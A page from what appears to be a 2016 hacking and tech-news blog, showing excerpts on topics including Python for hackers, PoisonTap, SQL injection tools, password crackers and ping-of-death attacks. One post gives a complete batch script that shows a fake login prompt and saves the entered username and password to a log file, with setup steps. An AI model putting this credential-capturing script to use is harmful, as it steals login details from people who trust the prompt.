Skip to main content

Posts

Showing posts from 2016

Reason why python is best for hackers

Many people learn Python specifically just for hacking and  when I first started with Python and moving from Java to Python personally felt a lot comfortable. When I needed to write a script which was not available on the internet I had to choose between Perl  and Python. Because Perl is another very popular open source interpreted programming language. When you google you will know that Python is a more popular programming language in hacking world. When compared to Perl, the Python programs are definitely clearer, simpler, easier to write and hence more maintainable and understandable. If you are someone interested in tinkering with the information security tasks, Python is a  great language to learn because of the availability of the large number of reverse engineering and exploitation libraries for your use. Why Python ? Without developing some of the basic scripting skills, aspiring hacker will be condemned to realm of the script kiddie. This actually means you will be limited

Original kickass torrent is back 'what a day'

After a long wait, the original KickassTorrents website is back with a new domain KATcr.co. Brought back by the original staffers, the new website looks just like KAT.cr. The website is rebuild using new user database, and safe elements. At the moment, due to high server load, the users are experiencing some troubles loading the website. After the death of KickassTorrents, the world’s most famous torrent website, a  number of fake proxies  arrived on the scene. This also helped the other torrent websites gain popularity. Back in July, we told you about Katcr.co. This website was a result of the original KickassTorrents staffers who grouped to build a  community website . Then, it didn’t offer any torrent links. Now, a larger group of KickassTorrent employees have launched the website loaded with torrents —  KATcr.co This fully operating torrent site looks similar to the deceased Kat.cr. Talking to  TF , the KATcr team said that the majority of original KAT site admins and crew have

Google is killing HTTP here is why

 Google is working to make users more aware of security risks posed by websites using an HTTP (Hyper Text Transfer Protocol) connection to transfer data. For this, a “not secure” warning label will be displayed in Google Chrome 56 scheduled to launch in January 2017. Modern times have witnessed a more sophisticated way of stealing data and stalking a person on the internet. The HTTP connection used by many websites is enough to lure malevolent minds to fulfill their intentions. Google is determined to demote the adoption of HTTP connection by websites. The reason behind this objective is that the HTTP connection is not secure. What does that mean? If a website uses an HTTP connection, the passwords and credit card details you type there are sent in plain text over the network making it possible for any middleman to read all of it. And it is not only about the credit card numbers, a website using an HTTP connection can be modified by a person before it reaches your computer. Another

Credit cards can be hacked

Beware! Your Credit/Debit Card Can Be Hacked In Just 6 Seconds Card number, expiry date, CVV2, address -- everything is guessable      A new attack mechanism, called Distributed Guessing Attack, can steal your credit and debit card details in as few as six seconds. This assault exploits two basic security flaws in the online payment systems–unlimited guesses on payment pages and variation in the payment data fields. Today, different kinds of cards have become the de facto means of online payments. This has also resulted in an increase in the number of online frauds taking place every month. The current situation, automatically, presents before us the question — what security methods are being taken to ensure a safe cashless transaction? The researchers from the University of Newcastle have carried out a research and published their result in the IEEE Security & Privacy Journal. The study shows how an attack mechanism, called Distributed Guessing Attack, can bypass all the secu

Anonymous warns the world world war 3 is coming soon

Hacktivist group Anonymous has shared a new video and highlighted the strong possibility of World War 3. The collective says that the WWIII is coming soon, citing different developments in Russia and China. If we talk about the possibility of the WWIII, different people have different opinions. While some people call it a far-fetched possibility, others cite some recent events and say that WWIII is closer than ever. Along the similar lines, the hacktivist collective Anonymous has released a new video warning the people about the World War 3. What’s the basis of such prediction? Well, in recent times, Britain and the United States promised troops are preparing to move   to Poland in NATO’s biggest military build-up on Russian borders since the Cold War. Also, according to another report, across Russia, 40 million military personnel and civilians have just finished up emergency drills. This exercise has been done to prepare the people to protect themselves against any eminent possibi

Top programming language for landing on a good and decent jobs

A programming language is a notation for writing programs, which are specifications of a computation or algorithm. Some, but not all, authors restrict the term “programming language” to those languages that can express  all  possible algorithms.Traits often considered important for what constitutes a programming language include: Function and targetA  computer programming language  is a language used to write computer programs, which involve a computer performing some kind of computation or algorithm and possibly control external devices such as printers, disk drives, robots,and so on. For example, PostScript programs are frequently created by another program to control a computer printer or display. More generally, a programming language may describe computation on some, possibly abstract, machine. It is generally accepted that a complete specification for a programming language includes a description, possibly idealized, of a machine or processor for that language. In most practical

Ever thought about sudo in linux here is a complete meaning

Sudo In Linux — A Lot More Than An Elevated Permissions Tool      At times, it is necessary to perform tasks with root privileges, there are a few solutions for this, some more secure than the others. This article will outline those solutions with an emphasis on sudo and its broad ability that is virtually unknown to many system administrators. When in need of running a process with elevated privileges, there are a three main solutions. Firstly, you can login as root, but this can only be done with the root password and still carries some security concerns. Secondly, you can use su to run a single command as root, still, this requires the root password. Lastly, there’s sudo, if improperly configured, it is a security nightmare, but if done properly, which is very easy, it can maintain a secure system while allowing flexibility in day to day operations. The first step to understanding the power and flexibility of sudo is in understand the aliases. User Alias  – This is exactly as

Poison tap can hack locked device in seconds

 What can you do with your $5 bill? You can get a trickster Raspberry Pi Zero which can fool a locked and password protected computer. It can hijack cookies, create backdoors, compromise the internal router, and above all, make the computer believe it’s connected to the internet.  We have seen many instances of people taking advantage of the USB to gain access to a device. A Raspberry Pi board can be a good companion while doing such activities. Usually, these USB hacking activities take advantage of one or more vulnerabilities in the operating system. But, what about a $5 Raspberry Pi Zero that’s an imposter. Poison tap  a trickster Pi Zero board, has been created by Samy Karkar. When connected to an exposed USB or Thunderbolt port, the device says to a computer that it’s an ethernet (via USB) device, not a regular USB device, and it’s a door to the entire internet. Your innocent machine quickly believes what is said by the PoisonTap, completely unknown of its real intentions. The

So what exactly is cryptography

Nowadays Internet is an important part of Life.  We are using the Internet for sending confidential data also like password,for storing army secrets. But the Internet is insecure medium.we all use internet at a daily basis.  Do you know why? Insecure Medium: Imagine you are sending a data.  In internet world, data are separated as packets and send to the destination.  Do you think the data directly reaching the destination?   If  you think so,you are wrong.  The packets are going through different routers.  Finally, the data is sent to the user.  In this gap, Intruders(i mean attackers) takes advantages. so who are they .the are  I.they  can see what you are sending.  Because your data are simple and easy to readable by anyone. How to secure the data? We can not stop the intruders and their activities.  But we can make our data as Unreadable for Intruders.  For this purpose, the Cryptography is introduced. Introduction to Cryptography: Julius Ceaser who introduce the Cryptography

How to secure your social medias

How To  Secure Your All Social Media Accounts  From Hackers? Social Media is a tool in every single person’s hand to share his/her feeling and idea to the world. But if your  social media account will hacked?  Then  where to go?  How to recover that account? And mostly asked Question is How To secure social media accounts Like Facebook, Gmail, Twitter and Instagram from hackers .So in this post i’ll tell you how to secure social media accounts from hackers.So in this article i’ll show you which methods hackers use to hack your accounts. How Hackers Hack Your Facebook/Gmail/Twitter Accounts.   #1. Phishing. Phishing is a Most common method used for hacking like  facebook hacking . mostly readers don’t have a single knowledge about that  What Is Phishing? phishing is trick to make a fake login page of any social media site like facebook or gmail or any other. as the hacker send you the fake login page of social sites in your gmail or in anyother site. as you enter your “ Email Addres

BBSQL and new injection tool written in python

BBQSQL  is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast. Summary We tried to write the tool in such a way that it would be very self explanatory when setting up an attack in the UI. However, for sake of thoroughness we have included a detailed Readme that should provide you additional insight on the specifics of each configuration option. One thing to note is that every configuration option in the UI has a description associated with it, so if you do choose to fire up the tool without reading this page you should be able to hack your way through an attack. High Level Usage Simila

Its beggining of end of cmd

 the latest Windows 10 Insider Build 14971, Microsoft has replaced Command Prompt with PowerShell as the default shell  system. Microsoft calls it a way to bring the best command line experience to the users. However, the users can tweak some settings and make Command Prompt the default shell. Microsoft has released a new windows 10 build 1471. The latest release brings many new features likes the ability to read EPUB books in Microsoft Edge web browser, and the new Paint 3D application. Another big change in Build 14971 comes in the form of making PowerShell the default shell in Windows 10. Microsoft has included Command Prompt in its Windows operating systems since a very long time. One the other hand, PowerShell is a comparatively newer and more powerful shell in Windows operating system. With this change, Microsoft aims to bring “the best command line experiences to the forefront for all power users”. From now on, in Windows 10, PowerShell will be the defacto command shell from

New best programming language to earn money

A programming language is a notation for writing programs, which are specifications of a computation or algorithm. Some, but not all, authors restrict the term “programming language” to those languages that can express  all  possible algorithms.Traits often considered important for what constitutes a programming language. A  computer programming language  is a language used to write computer programs, which involve a computer performing some kind of computation or algorithm and possibly control external devices such as printers, disk drives, robots,and so on. For example, PostScript programs are frequently created by another program to control a computer printer or display. More generally, a programming language may describe computation on some, possibly abstract, machine. It is generally accepted that a complete specification for a programming language includes a description, possibly idealized, of a machine or processor for that language. In most practical contexts, a programming la

Top websites of 2016 to learn ethical hacking

Here are the top 8 websites to learn ethical hacking Everybody wants to learn hacking in today’s age. However, this is not an easy task until you have basic knowledge about computers and network security. For beginners to know, there are two types of Hacking Ethical (White Hat) and Unethical (Black Hat). Unethical hacking is considered illegal while ethical hacking may be regarded as legal. We provide you with a list of websites that offers you white hat content. However, it is important to note that as a beginner to not perform any hacking & cracking tactics that breach any cyber law. Hackaday Hackaday is one of the top ranked sites that provide hacking news and all kinds of tutorials for hacking and networks. It also publishes several latest articles each day with detailed description about hardware and software hacks so that beginners and hackers are aware about it. Hackaday also has a YouTube channel where it posts projects and how-to videos. It provides users mixed content

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file will be in there, [if you make a second entry, the

Perform cmd death attack

 A ping packet can also be malformed to perform denial of service attack by sending continuous ping packets to the target IP address. A continuous ping will cause buffer overflow at the target system and will cause the target system to crash.  We often use the CMD command “Ping” to mostly check if a server or a gateway is up and running. But, ping command can also be used for some other purposes. If we look at the basic level, then a ping packet is generally of size 56 bytes or 84 bytes (including IP header as well). However, a ping packet can also be made as large as up to 65536 bytes. Well, that’s the negative side of the ping packet. When we increase the size of the ping packet unnaturally, forming a malformed ping packet to attack a computer system, this type of attack is called “Ping of death” attack. How Ping of Death attack works? Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent from a source computer to a target machine, t

How to cast harry potter spell using google

To celebrate and promote the release of Fantastic Beasts and Where to Find Them, Google and Warner Bros. Pictures have partnered. As a result, using Google Now voice assistant on your Android phone, you can cast “magical” spells. The three new Harry Potter spells are Lumos, Nox, and Silencio. If you’re a Harry Potter fan and you grew up in its magical world, there’s no doubt that you’ve always dreamed of becoming a wizard or witch. You can surely buy a wand these days but it won’t grant you any magical powers, of course. Now, Google, in partnership with Warner Bros. Pictures, is offering you a chance to cast Harry Potter spells using your Android devices. It’s a way to promote and celebrate the release of upcoming film “Fantastic Beasts and Where to Find Them” that takes place decades before Harry Potter arrives at Hogwarts. How to cast Harry Potter spells using Android? At the moment, there are  three new spells –Lumos, Nox, and Silencio–for your Android devices. To use them, all

Difference between virus ,trojan,malware

If you are among the ones who consider malware, worms, viruses to be the same thing then you’re on the wrong track. Read further, and improve your knowledge about these terms. If you’re a regular or even an occasional computer user, then you might’ve heard the terms like Viruses, Worms, Trojans, Bots, Malware, Spyware, etc. But honestly speaking, we consider all these to be a Virus, no matter, whatever be their type. But have you ever tried to acknowledge, what is the difference between these terms, although they are meant to harm your device, steal your data or spy on you, have you ever thought why they are named so differently. Basically, terms like Viruses, Trojans are all types of malicious software or simply ‘Malware’. Now, the first and foremost question arises, where did these terms came from? Clearly, they are not some out of the world aliens, in fact the real truth is that they were not even created with an intention to harm someone. The history of malware attacks goes ba

Best hacking and cracking tools for 2016

Password cracking is an integral part of digital forensics and pentesting. Keeping that in mind, we have prepared a list of the top 10 best password cracking tools that are widely used by ethical hackers and cybersecurity experts. These tools–including the likes of Aircrack, John the Ripper, and THC Hydra–use different algorithms and protocols to crack the passwords on a Windows, Linux, and OS X system. What is password cracking? In the field of cybersecurity and cryptography, password cracking plays a very major role. It’s basically the process of recovering passwords to breach (or restore) the security of a computer system. You can easily relate it to repeatedly guessing your phone’s unlock pattern or pin. So, why do we need to learn about password cracking and the tools used to do so? The purpose of password cracking revolves around recovering the forgotten passwords of our online accounts, computers, and smartphones. Password cracking is also used by system administrators a

How tor works

 Using the publicly available data, data visualization software firm Uncharted has prepared TorFlow — a map for visualizing how TOR’s data looks as it flows all across the world. It shows TOR network’s node and data movements based on the IP addresses of relays bouncing around the connections of users to avoid spying. TOR is the world’s most widely used tool for anonymity purposes . It has grown into a powerful network that’s spread all over the world. Surprisingly, the TOR project is transparent about the location of the TOR nodes and thousands of machines that power the network. This non-profit organization frequently published an updated list about the bandwidth and location of the computers and data centers spread all across the world. Using the same public data,  TorFlow  maps the TOR network’s nodes and data flow all around the world. This data movement is measured based on the IP addresses and bandwidth of the relay computers bouncing around the connections of users to avoi

How to hack IO devices in less than 5 minutes

The world we live in, everything that surrounds us is now vulnerable to hackers. From your microwave to security cameras in your office, all of these can be hacked and used to do malicious things you can’t imagine. As of now, we have 6.4 billion IoT devices and that number will reach 20 billion by the year 2020. This is the reason why security researchers are urging us to take security of IoT devices seriously, and my friend, they are soo right. Of Course they are people who will say that it is already late as they consider the huge and massive DDoS attacks which have attacked KrebsOnSecurity, OVH, and just recently Dyn. All of these attacks used botnets of unsecured IoT devices. But hey, hijacking IoT devices for DDoSing is only one of many ways attackers are going to use the affected IoT devices. Are IoT Devices the Weak Spots of Enterprise networks ? IoT devices are not just the points of attacks, they are the entry points hackers use to further attack the enterprise or even s

Remove virus from android

Desktops aren’t the only gadgets that can be affected by a virus. Android devices have a malware problem and it’s growing every day. If you do get a virus, you could perform a factory reset to get rid of it, but that means you’d lose all your data — those photos you shot, the saved games, the text messages, and everything else. Obviously, you want a factory reset to be your last option. So what can you do to remove a virus from Android without a factory reset? Is It Really a Virus? If your phone isn’t functioning the way it should be, there’s a chance you have some malware on it. One wrong tap somewhere and a malicious file might have been downloaded on your phone, which is leeching battery life, Internet resources, or your personal data. But it could be something else. Suppose your Android refuses to boot or crashes every time it starts up. Or maybe you can’t seem to download apps from the Play Store. These are not necessarily caused by a virus. So don’t panic! First, check our